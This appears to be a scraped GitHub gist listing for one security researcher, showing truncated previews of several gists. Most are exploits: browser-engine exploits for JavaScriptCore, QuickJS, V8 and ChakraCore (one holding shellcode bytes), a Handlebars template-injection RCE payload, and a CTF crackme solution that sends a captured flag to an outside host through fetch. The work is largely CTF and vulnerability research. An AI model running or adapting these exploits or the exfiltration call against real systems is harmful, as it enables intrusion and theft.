@itszn
itszn / google_fonts.json
Created June 1, 2024 21:40
I had claude-3-opus look at every google font and give a description
[
{
"name": "ABeeZee",
"desc": "Clean, modern, rounded, neutral sans-serif font. Geometric and minimalist letterforms with wide apertures and consistent stroke widths. Tags: web design, mobile apps, user interface, modern, minimal, friendly, approachable, tech, startup, blog",
"metadata": {
"family": "ABeeZee",
"displayName": null,
"category": "Sans Serif",
"stroke": "Sans Serif",
"classifications": [],
@itszn
itszn / exploit.js
Created July 11, 2018 16:27
Exploit for JavascriptCore CVE-2018-4192
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');
// Helpers to convert from float to int in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);
@itszn
itszn / quickjs.js
Created July 20, 2020 20:43
quickjs exploit
/*
* This exploit is targeting linux, tested on ubuntu 18.04
* Techniques should generally work on other OSs but I don't have any to test easily
*/
// Debugging functions
if (this.debug === undefined)
this.debug = ()=>{}
if (this.cc === undefined)
this.cc = ()=>{}
@itszn
itszn / 0day.handlebars
Created September 16, 2019 00:59
handlebars.js rce 0day
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}
//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}
@itszn
itszn / subleq.py
Created October 16, 2017 04:24
Binary Ninja subleq plugin
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
BranchType,
LowLevelILOperation, LLIL_TEMP,
LowLevelILLabel,
FlagRole,
LowLevelILFlagCondition,
log_error,
CallingConvention,
interaction,
@itszn
itszn / exploit.html
Last active April 9, 2021 18:31
34c3ctf V9 Exploit
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@itszn
itszn / exploit.js
Last active April 9, 2021 18:29
Trendmicro CTF ChakraCore exploit
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];
let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);
function i2f(i) {
convi[0] = i%0x100000000;
convi[1] = i/0x100000000;
return convf[0];
@itszn
itszn / d8.js
Last active March 5, 2021 16:31
Plaid CTF 2018 d8 exploit
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */
/* ### Utils, thanks saelo ### */
//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//
@itszn
itszn / challengeresult.lua
Last active February 13, 2021 22:15
LiqidWave-1.4.1 Challenges
-- TODO: move util functions to common.lua
local charts = {}
local passed = false
local desw = 770
local desh = 800
local moveX = 0
local moveY = 0
@itszn
itszn / solve1.html
Last active November 8, 2019 17:41
Easiest Crackme Solution
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
msg = event.data;
console.log("attacker got ",msg);
if (msg.id == 0) {
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
} else if (msg.id == 1) {
fetch("http://itszn.com/?flag="+msg.output);